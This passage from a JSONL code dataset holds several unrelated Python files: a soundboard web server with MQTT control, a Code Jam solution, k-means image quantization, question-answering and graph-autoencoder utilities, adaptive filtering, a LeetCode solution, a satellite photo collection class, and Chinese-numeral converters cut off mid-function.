= Depends(get_current_username)):\n \"\"\"\n Save current folder Info\n \"\"\"\n\n info = await request.json()\n current_folder = info[\"current_folder\"]\n folder_info = FolderInfo(**info[\"folder_info\"])\n for i in range(len(folder_info.content)):\n folder_info.content[i] = FileInfo(**folder_info.content[i])\n\n save_folder_info(current_folder, folder_info)\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/{full_path:path}\", include_in_schema=False)\ndef root(request: Request, 
full_path: str, username: str = Depends(get_current_username)):\n index_file = pkg_resources.resource_string(__name__, \"./index.html\").decode(\"utf-8\", \"ignore\")\n return HTMLResponse(index_file)\n\n\ndef find_sound_by_topic(topic):\n \"\"\"\n Returns FileInfo from all folders that match a MQTT topic from the Web UI\n \"\"\"\n matchs = []\n all_info_files = glob(f\"{MEDIA_FOLDER}**/folder_info.json\", recursive=True)\n for info_file in all_info_files:\n info = get_folder_info(info_file.split(MEDIA_FOLDER, 1)[1].rsplit(\"folder_info.json\", 1)[0])\n for sound in info.content:\n if sound.mqtt_topic == topic:\n matchs.append(sound)\n\n return matchs\n\n\ndef on_message(client, userdata, message):\n if message.topic == \"simple_soundboard/stop_all\":\n sound_engine.stop_all()\n elif message.topic == \"simple_soundboard/stop_sounds\":\n sound_engine.stop_sounds()\n elif message.topic == \"simple_soundboard/fadeout\":\n sound_engine.fadeout_music()\n elif message.topic == \"simple_soundboard/pause_music\":\n sound_engine.pause_music()\n elif message.topic == \"simple_soundboard/resume_music\":\n sound_engine.resume_music()\n elif message.topic.startswith(\"simple_soundboard/play/\"):\n sounds = find_sound_by_topic(message.topic.split(\"simple_soundboard/play/\", 1)[1])\n for sound in sounds:\n api_play_sound(sound)\n\n\ndef start():\n sound_engine.init()\n mqtt_config = get_config()[\"mqtt\"]\n if mqtt_config[\"mqtt_api_enabled\"]:\n mqtt_api.start(\n mqtt_config[\"host\"],\n mqtt_config[\"port\"],\n mqtt_config[\"username\"],\n mqtt_config[\"password\"],\n on_message,\n )\n else:\n logger.info(\"MQTT API is disabled\")\n\n uvicorn.run(app, host=\"0.0.0.0\", port=get_config()[\"port\"])\n return sys.exit()\n\n\nif __name__ == \"__main__\":\n start()\n","repo_name":"martinrioux/simple_soundboard","sub_path":"src/simple_soundboard/web_ui.py","file_name":"web_ui.py","file_ext":"py","file_size_in_byte":11436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28664690286","text":"PROBLEM = 'B-large'\n\nfin = open(PROBLEM+'.in', 'r')\nfout = open(PROBLEM+'.out', 'w')\n\ndef read_ints():\n l = fin.readline().strip()\n return [int(x) for x in l.split()]\n\nT, = read_ints()\n\ndef min_flips(stack):\n stack += '+'\n n_changes = 0\n prev = stack[0]\n for p in stack[1:]:\n if p != prev:\n n_changes += 1\n prev = p\n return n_changes\n\nfor caseno in range(1, T+1):\n print('Case #{}'.format(caseno))\n stack = fin.readline().strip()\n print(stack)\n\n res = min_flips(stack)\n\n print('res =', res)\n fout.write('Case #{}: {}\\n'.format(caseno, res))\n print()\n","repo_name":"DaHuO/Supergraph","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_takluyver_B.py","file_name":"16_0_2_takluyver_B.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31722491300","text":"import time\r\nstart_time = time.time()\r\nprint(\"Process finished --- %s seconds ---\" % (time.time() - start_time))\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\nfrom sklearn.cluster import KMeans\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\n# img=mpimg.imread('test_kmean.jfif')\r\nimg=mpimg.imread('nam1.jpg')\r\n\r\nHEIGHT = img.shape[0]\r\nWIDTH = img.shape[1]\r\ndim = img.shape[2]\r\nn_colors = 9\r\nimg = img.reshape(-1,dim)\r\n\r\nCOLORS = []\r\nkmeans = KMeans(n_clusters=n_colors, random_state=0).fit(img)\r\nlabels = kmeans.labels_\r\n# 
print(labels.index(1))\r\nfor i in range(n_colors):\r\n sum_r = 0\r\n sum_g = 0\r\n sum_b = 0\r\n sum_rgb = 0\r\n for j in range(len(labels)):\r\n if labels[j] == i:\r\n sum_rgb += 1\r\n sum_r += img[j][0]\r\n sum_g += img[j][1]\r\n sum_b += img[j][2]\r\n COLORS.append([round(sum_r/sum_rgb,2),round(sum_g/sum_rgb,2),round(sum_b/sum_rgb,2)])\r\n\r\nprint(COLORS)\r\nfor i in range(len(img)):\r\n img[i] = COLORS[labels[i]]\r\n\r\nimg = img.reshape(HEIGHT,WIDTH,dim)\r\nprint(img)\r\nprint(\"Process finished --- %s seconds ---\" % (time.time() - start_time))\r\n\r\n#command for print the picture with rgb value\r\nimgplot = plt.imshow(img)\r\nplt.show()\r\n\r\nim = Image.fromarray(img)\r\nim.save(\"picture_kmean_1.jpeg\")\r\n\r\n","repo_name":"nguyenducnam03/Kmean_resize_picture_P2","sub_path":"main_nam1.py","file_name":"main_nam1.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15557630324","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 27 20:52:18 2019\r\n\r\n@author: cmy\r\n\"\"\"\r\n\r\nimport thulac\r\nimport codecs as cs\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport gensim\r\nsegger = thulac.thulac(seg_only=True)\r\n\r\n#word embedding\r\nchinese_embedding = {}\r\nwith cs.open('../../token2vec/zhwiki_2017_03.sg_50d.word2vec','r','utf-8') as fp:\r\n lines = fp.read().split('\\n')[1:100000]\r\n for line in lines:\r\n line = line.strip()\r\n elements = line.split(' ')\r\n chinese_embedding[elements[0]] = []\r\n for num in elements[1:]:\r\n chinese_embedding[elements[0]].append(float(num))\r\n#model = gensim.models.KeyedVectors.load_word2vec_format('../../token2vec/zhwiki_2017_03.sg_50d.word2vec',binary = False)\r\n\r\n\r\ndef ComputeSimilar(p_tokens,q_tokens,wordvec):\r\n '''\r\n 输入两个词序列,计算最大余弦距离和最大点乘值\r\n input:\r\n p_tokens: python-list\r\n q_tokens: python-list\r\n '''\r\n def cosine_Matrix(A, B):\r\n AB = np.matmul(A,np.transpose(B))\r\n A_norm = np.sqrt(np.sum(np.multiply(A,A),axis=-1))\r\n B_norm = np.sqrt(np.sum(np.multiply(B,B),axis=-1))\r\n norm = np.matmul(np.expand_dims(A_norm,axis=1),np.transpose(np.expand_dims(B_norm,axis=1)))\r\n return np.divide(AB,norm)\r\n p_embeddings = []\r\n q_embeddings = []\r\n for p in p_tokens:\r\n try:\r\n p_embeddings.append(wordvec[p])\r\n except:\r\n pass\r\n for q in q_tokens:\r\n try:\r\n q_embeddings.append(wordvec[q])\r\n except:\r\n pass\r\n if len(p_embeddings) == 0 or len(q_embeddings) == 0:\r\n return 0.0\r\n #计算余弦距离\r\n matrix = cosine_Matrix(np.array(p_embeddings),np.array(q_embeddings))\r\n sim_cos= np.sum(np.max(matrix,axis=1))#cos相似度之和\r\n return sim_cos\r\n\r\n\r\ndef ComputeTupleFeatures(predicates,question):\r\n '''\r\n 为每个候选tuple和问题计算人工特征\r\n predicates:[r1name,r2name]或[r1name,r2name]\r\n question:str\r\n q_tokens:未加载词典的分词结果\r\n q_chars:分字结果\r\n '''\r\n p_tokens = []\r\n for p in predicates:\r\n p_tokens.extend(segger.cut(p))\r\n p_tokens = [token[0] for token in p_tokens]\r\n p_chars = [char for char in ''.join(predicates)]\r\n \r\n q_tokens = segger.cut(question)\r\n q_tokens = [token[0] for token in q_tokens]\r\n q_chars = [char for char in question]\r\n #计算谓词和问题的word overlap\r\n word_overlap = len(set(p_tokens).intersection(set(q_tokens)))\r\n #计算谓词和问题的char overlap\r\n char_overlap = len(set(p_chars).intersection(set(q_chars)))\r\n #向量序列相似度\r\n word_similar_cos= ComputeSimilar(p_tokens,q_tokens,chinese_embedding)\r\n char_similar_cos= ComputeSimilar(p_chars,q_chars,chinese_embedding)\r\n return 
[word_overlap,word_similar_cos,char_overlap,char_similar_cos]\r\n\r\ndef features_from_two_sequences(s1,s2):\r\n #overlap\r\n overlap = len(set(s1)&(set(s2)))\r\n #集合距离\r\n jaccard = len(set(s1)&(set(s2))) / len(set(s1)|(set(s2)))\r\n #词向量相似度\r\n #wordvecsim = model.similarity(''.join(s1),''.join(s2))\r\n return [overlap,jaccard]\r\n\r\ndef ComputeEntityFeatures(question,entity,relations):\r\n '''\r\n 抽取每个实体或属性值2hop内的所有关系,来跟问题计算各种相似度特征\r\n input:\r\n question: python-str\r\n entity: python-str \r\n relations: python-dic key:\r\n output:\r\n [word_overlap,char_overlap,word_embedding_similarity,char_overlap_ratio]\r\n '''\r\n #得到主语-谓词的tokens及chars\r\n p_tokens = []\r\n for p in relations:\r\n p_tokens.extend(segger.cut(p[1:-1]))\r\n p_tokens = [token[0] for token in p_tokens]\r\n p_chars = [char for char in ''.join(p_tokens)]\r\n \r\n q_tokens = segger.cut(question)\r\n q_tokens = [token[0] for token in q_tokens]\r\n q_chars = [char for char in question]\r\n \r\n e_tokens = segger.cut(entity[1:-1])\r\n e_tokens = [token[0] for token in e_tokens]\r\n e_chars = [char for char in entity[1:-1]]\r\n \r\n qe_feature = features_from_two_sequences(q_tokens,e_tokens) + features_from_two_sequences(q_chars,e_chars)\r\n qr_feature = features_from_two_sequences(q_tokens,p_tokens) + features_from_two_sequences(q_chars,p_chars)\r\n #实体名和问题的overlap除以实体名长度的比例\r\n return qe_feature+qr_feature\r\n\r\nif __name__ == '__main__':\r\n print (ComputeEntityFeatures('高谭市的守护者的中文名是什么?','<高谭市>',['<守护者>']))\r\n","repo_name":"duterscmy/ccks2019-ckbqa-4th-codes","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":468,"dataset":"github-code","pt":"75"} +{"seq_id":"25716826969","text":"import pickle as pkl\r\n\r\nimport networkx as nx\r\nimport numpy as np\r\nimport scipy.sparse as sp\r\nimport torch\r\nfrom sklearn.metrics import roc_auc_score, average_precision_score\r\nimport sys\r\nfrom torch.nn import functional as F\r\n\r\ndef load_data(dataset):\r\n # load the data: x, tx, allx, graph\r\n names = ['x', 'tx', 'allx', 'graph']\r\n objects = []\r\n for i in range(len(names)):\r\n '''\r\n fix Pickle incompatibility of numpy arrays between Python 2 and 3\r\n https://stackoverflow.com/questions/11305790/pickle-incompatibility-of-numpy-arrays-between-python-2-and-3\r\n '''\r\n with open(\"data/ind.{}.{}\".format(dataset, names[i]), 'rb') as rf:\r\n u = pkl._Unpickler(rf)\r\n u.encoding = 'latin1'\r\n cur_data = u.load()\r\n objects.append(cur_data)\r\n x, tx, allx, graph = tuple(objects)\r\n test_idx_reorder = parse_index_file(\r\n \"data/ind.{}.test.index\".format(dataset))\r\n test_idx_range = np.sort(test_idx_reorder)\r\n\r\n if dataset == 'citeseer':\r\n # Fix citeseer dataset (there are some isolated nodes in the graph)\r\n # Find isolated nodes, add them as zero-vecs into the right position\r\n test_idx_range_full = range(\r\n min(test_idx_reorder), max(test_idx_reorder) + 1)\r\n tx_extended = sp.lil_matrix((len(test_idx_range_full), x.shape[1]))\r\n tx_extended[test_idx_range - min(test_idx_range), :] = tx\r\n tx = tx_extended\r\n\r\n features = sp.vstack((allx, tx)).tolil()\r\n features[test_idx_reorder, :] = features[test_idx_range, :]\r\n features = torch.FloatTensor(np.array(features.todense()))\r\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph))\r\n\r\n return adj, features\r\n\r\ndef load_label(dataset):\r\n names = ['ty', 'ally']\r\n objects = []\r\n for i in range(len(names)):\r\n with 
open(\"data/ind.{}.{}\".format(dataset, names[i]), 'rb') as f:\r\n if sys.version_info > (3, 0):\r\n objects.append(pkl.load(f, encoding='latin1'))\r\n else:\r\n objects.append(pkl.load(f))\r\n ty, ally = tuple(objects)\r\n test_idx_reorder = parse_index_file(\"data/ind.{}.test.index\".format(dataset))\r\n test_idx_range = np.sort(test_idx_reorder)\r\n\r\n if dataset == 'citeseer':\r\n test_idx_range_full = range(min(test_idx_reorder), max(test_idx_reorder)+1)\r\n ty_extended = np.zeros((len(test_idx_range_full), ty.shape[1]))\r\n ty_extended[test_idx_range-min(test_idx_range), :] = ty\r\n ty = ty_extended\r\n\r\n label = sp.vstack((ally, ty)).tolil()\r\n label[test_idx_reorder, :] = label[test_idx_range, :]\r\n label = np.argmax(label.toarray(), axis = 1)\r\n return label\r\n\r\ndef parse_index_file(filename):\r\n index = []\r\n for line in open(filename):\r\n index.append(int(line.strip()))\r\n return index\r\n\r\n\r\ndef sparse_to_tuple(sparse_mx):\r\n if not sp.isspmatrix_coo(sparse_mx):\r\n sparse_mx = sparse_mx.tocoo()\r\n coords = np.vstack((sparse_mx.row, sparse_mx.col)).transpose() # 坐标\r\n values = sparse_mx.data\r\n shape = sparse_mx.shape\r\n return coords, values, shape\r\n\r\n\r\ndef mask_test_edges(adj):\r\n # pos: 划分边(不包含i-i)\r\n # neg:\r\n # Function to build test set with 10% positive links\r\n # NOTE: Splits are randomized and results might slightly deviate from reported numbers in the paper.\r\n # TODO: Clean up.\r\n\r\n # Remove diagonal elements\r\n adj = adj - sp.dia_matrix((adj.diagonal()[np.newaxis, :], [0]), shape=adj.shape)\r\n adj.eliminate_zeros()\r\n # Check that diag is zero:\r\n assert np.diag(adj.todense()).sum() == 0\r\n\r\n # pos\r\n adj_triu = sp.triu(adj) # \r\n adj_tuple = sparse_to_tuple(adj_triu)\r\n edges = adj_tuple[0]\r\n edges_all = sparse_to_tuple(adj)[0]\r\n num_test = int(np.floor(edges.shape[0] / 10.))\r\n num_val = int(np.floor(edges.shape[0] / 20.))\r\n\r\n all_edge_idx = list(range(edges.shape[0]))\r\n np.random.shuffle(all_edge_idx)\r\n val_edge_idx = all_edge_idx[:num_val]\r\n test_edge_idx = all_edge_idx[num_val:(num_val + num_test)]\r\n test_edges = edges[test_edge_idx]\r\n val_edges = edges[val_edge_idx]\r\n train_edges = np.delete(edges, np.hstack([test_edge_idx, val_edge_idx]), axis=0)\r\n\r\n def ismember(a, b, tol=5):\r\n rows_close = np.all(np.round(a - b[:, None], tol) == 0, axis=-1) # \r\n return np.any(rows_close) #\r\n\r\n test_edges_false = []\r\n while len(test_edges_false) < len(test_edges):\r\n idx_i = np.random.randint(0, adj.shape[0])\r\n idx_j = np.random.randint(0, adj.shape[0])\r\n if idx_i == idx_j:\r\n continue\r\n if ismember([idx_i, idx_j], edges_all):\r\n continue\r\n if test_edges_false:\r\n if ismember([idx_j, idx_i], np.array(test_edges_false)):\r\n continue\r\n if ismember([idx_i, idx_j], np.array(test_edges_false)):\r\n continue\r\n test_edges_false.append([idx_i, idx_j])\r\n\r\n val_edges_false = []\r\n while len(val_edges_false) < len(val_edges):\r\n idx_i = np.random.randint(0, adj.shape[0])\r\n idx_j = np.random.randint(0, adj.shape[0])\r\n if idx_i == idx_j:\r\n continue\r\n if ismember([idx_i, idx_j], edges_all):\r\n continue\r\n if ismember([idx_i, idx_j], test_edges):\r\n continue\r\n if ismember([idx_j, idx_i], test_edges):\r\n continue\r\n if ismember([idx_i, idx_j], train_edges):\r\n continue\r\n if ismember([idx_j, idx_i], train_edges):\r\n continue\r\n if ismember([idx_i, idx_j], val_edges):\r\n continue\r\n if ismember([idx_j, idx_i], val_edges):\r\n continue\r\n if val_edges_false:\r\n if 
ismember([idx_j, idx_i], np.array(val_edges_false)):\r\n continue\r\n if ismember([idx_i, idx_j], np.array(val_edges_false)):\r\n continue\r\n val_edges_false.append([idx_i, idx_j])\r\n\r\n assert ~ismember(val_edges_false, train_edges)\r\n assert ~ismember(val_edges_false, val_edges)\r\n\r\n assert ~ismember(test_edges_false, edges_all)\r\n assert ~ismember(val_edges_false, edges_all)\r\n assert ~ismember(val_edges, train_edges)\r\n assert ~ismember(test_edges, train_edges)\r\n assert ~ismember(val_edges, test_edges)\r\n\r\n\r\n data = np.ones(train_edges.shape[0])\r\n\r\n # Re-build adj matrix\r\n adj_train = sp.csr_matrix((data, (train_edges[:, 0], train_edges[:, 1])), shape=adj.shape)\r\n adj_train = adj_train + adj_train.T #对称\r\n\r\n # NOTE: these edge lists only contain single direction of edge!\r\n return adj_train, train_edges, val_edges, val_edges_false, test_edges, test_edges_false\r\n\r\n\r\ndef preprocess_graph(adj):\r\n adj = sp.coo_matrix(adj)\r\n adj_ = adj + sp.eye(adj.shape[0])\r\n rowsum = np.array(adj_.sum(1))\r\n degree_mat_inv_sqrt = sp.diags(np.power(rowsum, -0.5).flatten())\r\n adj_normalized = adj_.dot(degree_mat_inv_sqrt).transpose().dot(degree_mat_inv_sqrt).tocoo()\r\n # return sparse_to_tuple(adj_normalized)\r\n return sparse_mx_to_torch_sparse_tensor(adj_normalized)\r\n\r\n\r\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\r\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\r\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\r\n indices = torch.from_numpy(\r\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\r\n values = torch.from_numpy(sparse_mx.data)\r\n shape = torch.Size(sparse_mx.shape)\r\n return torch.sparse.FloatTensor(indices, values, shape)\r\n\r\n\r\ndef get_roc_score(emb, adj_orig, edges_pos, edges_neg):\r\n def sigmoid(x):\r\n return 1 / (1 + np.exp(-x))\r\n\r\n def sigmoid_ad(x):\r\n x_ravel = x.ravel() \r\n length = len(x_ravel)\r\n y = []\r\n for index in range(length):\r\n if x_ravel[index] >= 0:\r\n y.append(1.0 / (1 + np.exp(-x_ravel[index])))\r\n else:\r\n y.append(np.exp(x_ravel[index]) / (np.exp(x_ravel[index]) + 1))\r\n return np.array(y).reshape(x.shape)\r\n\r\n # Predict on test set of edges\r\n adj_rec = np.dot(emb, emb.T)\r\n preds = []\r\n pos = []\r\n for e in edges_pos:\r\n preds.append(sigmoid_ad(adj_rec[e[0], e[1]]))\r\n\r\n\r\n pos.append(adj_orig[e[0], e[1]])\r\n\r\n preds_neg = []\r\n neg = []\r\n for e in edges_neg:\r\n preds_neg.append(sigmoid_ad(adj_rec[e[0], e[1]]))\r\n\r\n \r\n neg.append(adj_orig[e[0], e[1]])\r\n\r\n preds_all = np.hstack([preds, preds_neg])\r\n labels_all = np.hstack([np.ones(len(preds)), np.zeros(len(preds_neg))])\r\n roc_score = roc_auc_score(labels_all, preds_all)\r\n ap_score = average_precision_score(labels_all, preds_all)\r\n\r\n return roc_score, ap_score\r\n\r\ndef gaussian_parameters(h, dim=-1):#输入h:64*32\r\n\t\"\"\"\r\n\tConverts generic real-valued representations into mean and variance\r\n\tparameters of a Gaussian distribution\r\n\r\n\tArgs:\r\n\t\th: tensor: (batch, ..., dim, ...): Arbitrary tensor\r\n\t\tdim: int: (): Dimension along which to split the tensor for mean and\r\n\t\t\tvariance\r\n\r\n\tReturns:z\r\n\t\tm: tensor: (batch, ..., dim / 2, ...): Mean\r\n\t\tv: tensor: (batch, ..., dim / 2, ...): Variance\r\n\t\"\"\"\r\n\tm, h = torch.split(h, h.size(dim) // 2, dim=dim)#h: 64*16 m:64*16\r\n\tv = F.softplus(h) + 1e-8\r\n\treturn m, v #m: 64*16 v: 64*16\r\n\r\ndef _h_A(A, m):\r\n\texpm_A = matrix_poly(A*A, m)\r\n\th_A = torch.trace(expm_A) - 
m\r\n\treturn h_A\r\n\r\ndef matrix_poly(matrix, d):\r\n x = torch.eye(d)+ torch.div(matrix, d)\r\n return torch.matrix_power(x, d)","repo_name":"7231/Concept-free-Causal-Disentangle","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19798999203","text":"\"\"\"\npaper: https://www.sciencedirect.com/science/article/pii/S0378779605002415\n\"\"\"\nimport numpy as np\nimport matplotlib.pylab as plt\n\nimport signalz\nimport padasip as pa\n\nnp.random.seed(101)\n\nN = 15000\nn = 20\nn_skip = 10000\ndummy = False\n\n# if dummy:\n# d = signalz.levy_flight(N, alpha=1.8, beta=0., sigma=1., position=0)\n# else:\n# filename = \"data/DAT_ASCII_EURUSD_M1_201809.csv\"\n# d = np.loadtxt(open(filename, \"rb\"), delimiter=\";\", skiprows=1, usecols=(1,))\n\n\nq = signalz.random_steps(500, steps_count=40, distribution=\"standard\", std=3, mean=0)\nN = len(q)\nd = q + signalz.gaussian_white_noise(N, offset=0, std=0.1)\n\n\n\nx = pa.input_from_history(d, n)[:-1]\nd = d[n:]\n\n\nfilters = [\n {\"filter\": pa.filters.FilterNLMS(n=n, mu=1., w=\"zeros\")},\n {\"filter\": pa.filters.FilterRLS(n=n, mu=0.95, w=\"random\")},\n {\"filter\": pa.filters.FilterLMS(n=n, mu=0.1, w=\"random\")},\n]\n\n\n# for f in filters:\n# y, e, w = f[\"filter\"].run(d, x)\n# elbnd = pa.detection.ELBND(w, e, function=\"max\")\n\n\ny, e, w = filters[1][\"filter\"].run(d, x)\nelbnd = pa.detection.ELBND(w, e, function=\"max\")\n\n\n\n\n\n\nplt.subplot(311)\nplt.plot(d[n_skip:])\nplt.plot(y[n_skip:])\nplt.plot(q[n_skip:], \"k\")\n\n\nplt.subplot(312)\nplt.plot(elbnd[n_skip:])\n\nplt.subplot(313)\nplt.plot(np.abs(np.diff(d)[n_skip:]))\n\nplt.show()\n\n","repo_name":"matousc89/qwersfr1as4","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14181125191","text":"'''\nHash Table\n\n执行用时:1248 ms, 在所有 Python3 提交中击败了53.29% 的用户\n内存消耗:15 MB, 在所有 Python3 提交中击败了75.82% 的用户\n通过测试用例:32 / 32\n'''\nclass Solution:\n def numberOfBoomerangs(self, points: List[List[int]]) -> int:\n ans = 0\n N = len(points)\n for i in range(N):\n # dist: (x1 - x2) ^ 2 + (y1 - y2) ^2\n dist2cnt = defaultdict(int)\n for j in range(N):\n if i == j:\n continue\n x1, y1 = points[i]\n x2, y2 = points[j]\n d = (x1 - x2) ** 2 + (y1 - y2) ** 2\n dist2cnt[d] += 1\n for d, c in dist2cnt.items():\n ans += c * (c - 1)\n\n return ans\n","repo_name":"lixiang2017/leetcode","sub_path":"leetcode-cn/0447.0_Number_of_Boomerangs.py","file_name":"0447.0_Number_of_Boomerangs.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14444021507","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom Classes.Photo import Photo\n\n\nclass Collection:\n \"\"\"\n Classe chargée de stocker des informations sur les collections d'images.\n \"\"\"\n\n def __init__(self, nb_points, nb_photos, nb_intervalles):\n \"\"\"\n :param nb_points: le nombre de points rapportés par la collection si on la complète\n :param nb_photos: le nombre de points d'intérêt à photograpier\n :param nb_intervalles: le nombre d'intervalles dans lesquels on peut photographier\n \"\"\"\n self.nb_points = nb_points\n self.nb_photos = nb_photos\n self.nb_intervalles = nb_intervalles\n self.liste_intervalles = [] # Liste des intervalles pour la 
collection\n self.liste_photos = [] # Liste d'instances de la classe Photo, qu'on initialise vide et remplit ensuite\n self.ratio_rentabilite = self.donner_ratio(nb_points, nb_photos) # Représente le poids de la collection\n self.complete = False # Booléen qui indique si la collection est complétée ou non\n\n def donner_ratio(self, nb_points, nb_photos):\n \"\"\"\n Méthode chargée de :\n Calculer le ratio de rentabilité.\n \"\"\"\n ratio = nb_points / nb_photos\n return ratio\n\n def ajouter_photo(self, photo):\n \"\"\"\n Méthode qui ajoute une instance de la classe Photo à la collection.\n :param photo:instance de la classe Photo\n \"\"\"\n self.liste_photos.append(photo)\n\n def ajouter_intervalle(self, intervalle):\n \"\"\"\n Méthode qui ajoute un intervalle à la collection.\n :param intervalle: liste de deux entiers\n \"\"\"\n self.liste_intervalles.append(intervalle)\n\n def update(self):\n \"\"\"\n Méthode qui met à jour la collection et indique en retour si elle est complète.\n :return: Un booléen qui indique si la collection est complète\n \"\"\"\n self.nb_photos -= 1\n if self.nb_photos == 0:\n self.complete = True\n return self.complete\n\n\"\"\"Tests divers.\"\"\"\nif __name__ == \"__main__\":\n nb_points = 192\n nb_photos = 1\n nb_intervalles = 1\n # Création d'une collection\n c1 = Collection(nb_points, nb_photos, nb_intervalles)\n\n # Test de la méthode ajouter_photo\n # 97797 -340859\n c1.ajouter_photo(Photo(97797, -340859, c1))\n\n # Test de la méthode ajouter_intervalle\n # 0 604799\n c1.ajouter_intervalle([0, 604799])\n\n # Test de la méthode donner_ratio\n ratio = c1.donner_ratio(nb_points, nb_photos)\n print(\"Ratio de rentabilité de la collection : \" + str(ratio))\n","repo_name":"SimylinK/-Google-Hash-Code-2016-","sub_path":"Classes/Collection.py","file_name":"Collection.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17206336704","text":"# 自定义报错\r\nclass CNnumError(Exception):\r\n pass\r\n\r\n# 万以内中文数字转阿拉伯数字\r\ndef num_count(ch_list):\r\n num = 0\r\n number_dict = {\r\n '零':0,\r\n '一':1,\r\n '壹':1,\r\n '二':2,\r\n '两':2,\r\n '贰':2,\r\n '三':3,\r\n '叁':3,\r\n '四':4,\r\n '肆':4,\r\n '五':5,\r\n '伍':5,\r\n '六':6,\r\n '陆':6,\r\n '七':7,\r\n '柒':7,\r\n '八':8,\r\n '捌':8,\r\n '九':9,\r\n '玖':9\r\n }\r\n places_dict = {\r\n '十':10,\r\n '拾':10,\r\n '百':100,\r\n '佰':100,\r\n '千':1000,\r\n '仟':1000\r\n }\r\n if ch_list:\r\n for i in range(len(ch_list)):\r\n if ch_list[i] in places_dict:\r\n num += number_dict[ch_list[i-1]] * places_dict[ch_list[i]]\r\n if ch_list[-1] in number_dict:\r\n num += number_dict[ch_list[-1]]\r\n return num\r\n else:\r\n return 0\r\n\r\n# 万以上亿以内中文数字转阿拉伯数字\r\ndef wannum_num(chnum):\r\n chnum_dict = {}\r\n\r\n if '万' in chnum:\r\n chnum_dict['Wan'] = list(chnum.split('万')[0])\r\n chnum_dict['Ge'] = list(chnum.split('万')[1])\r\n else:\r\n chnum_dict['Ge'] = list(chnum)\r\n\r\n Wan_num = 0\r\n Ge_num = 0\r\n for i,j in chnum_dict.items():\r\n if i == 'Wan':\r\n Wan_num = num_count(j) * 10000\r\n else:\r\n Ge_num = num_count(j)\r\n num = Wan_num + Ge_num\r\n return num\r\n\r\n# 最终版中文数字转阿拉伯数字\r\ndef CNnum_num(chnum):\r\n police = ['零','一','壹','二','贰','三','叁','四','肆','五','伍','六','陆','七','柒','八','捌','九','玖','十','拾','百','佰','千','仟']\r\n for i in chnum:\r\n if i not in police:\r\n raise CNnumError(f'{i}不是正确的中文数字')\r\n if '亿' in chnum:\r\n Yi_num = wannum_num(chnum.split('亿')[0]) * 100000000\r\n num = wannum_num(chnum.split('亿')[1]) + Yi_num\r\n else:\r\n num = 
wannum_num(chnum)\r\n return num\r\n\r\n# 将字符串反向分割成指定长度的字符串列表(反向re.findall(r'.{lenth}',string))(例:string长度为11,lenth为4,分割为长度分别为3、4、4的字符串并组成列表)\r\ndef split2(string,lenth):\r\n string2 = ''\r\n strlist = []\r\n for i in range(1,len(string)+1):\r\n if i % lenth != 0:\r\n string2 += string[-i]\r\n if i == len(string):\r\n strlist.append(string2)\r\n else:\r\n string2 += string[-i]\r\n strlist.append(string2)\r\n string2 = ''\r\n strlist.reverse()\r\n strlist2 = []\r\n for i in strlist:\r\n strlist2.append(i[::-1])\r\n return strlist2\r\n\r\n# 4位及以下阿拉伯数字(str格式)转中文数字\r\ndef num4_cnnum(num,CNnumtype): #CHnumtype=True时为大写中文数字,反之为小写\r\n if CNnumtype:\r\n j = 1\r\n else:\r\n j = 0\r\n number_dict_list = {\r\n '0':'零',\r\n '1':['一','壹'],\r\n '2':['二','贰'],\r\n '3':['三','叁'],\r\n '4':['四','肆'],\r\n '5':['五','伍'],\r\n '6':['六','陆'],\r\n '7':['七','柒'],\r\n '8':['八','捌'],\r\n '9':['九','玖']\r\n }\r\n places_dict_list = {\r\n -2:['十','拾'],\r\n -3:['百','佰'],\r\n -4:['千','仟'],\r\n }\r\n num_list = []\r\n a = 0\r\n for i in range(1,len(num)+1):\r\n if num[-i] != '0':\r\n a = 1\r\n if a:\r\n if i == 1:\r\n num_list.append(number_dict_list[num[-i]][j])\r\n else:\r\n if num[-i] == '0':\r\n num_list.append(number_dict_list[num[-i]][j])\r\n else:\r\n num_list.append(number_dict_list[num[-i]][j] + places_dict_list[-i][j])\r\n # print(num_list)\r\n\r\n a = 1\r\n chnum = ''\r\n for i in range(1,len(num_list)+1):\r\n if num_list[-i] == '零':\r\n if a:\r\n chnum += num_list[-i]\r\n a = 0\r\n else:\r\n chnum += num_list[-i]\r\n a = 1\r\n return chnum\r\n\r\n# 12位及以下阿拉伯数字(str格式)转中文数字\r\ndef num_cnnum(num,CNnumtype=False):\r\n if type(num) != type(''):\r\n raise TypeError(f\"{num}的格式不是'str'\")\r\n\r\n if len(num) < 13:\r\n num_list = split2(num,4)\r\n num_list.reverse()\r\n big_places_list = ['','万','亿']\r\n cnnum_list = []\r\n for i in range(len(num_list)):\r\n cnnum_list.append(num4_cnnum(num_list[i],CNnumtype)+big_places_list[i])\r\n 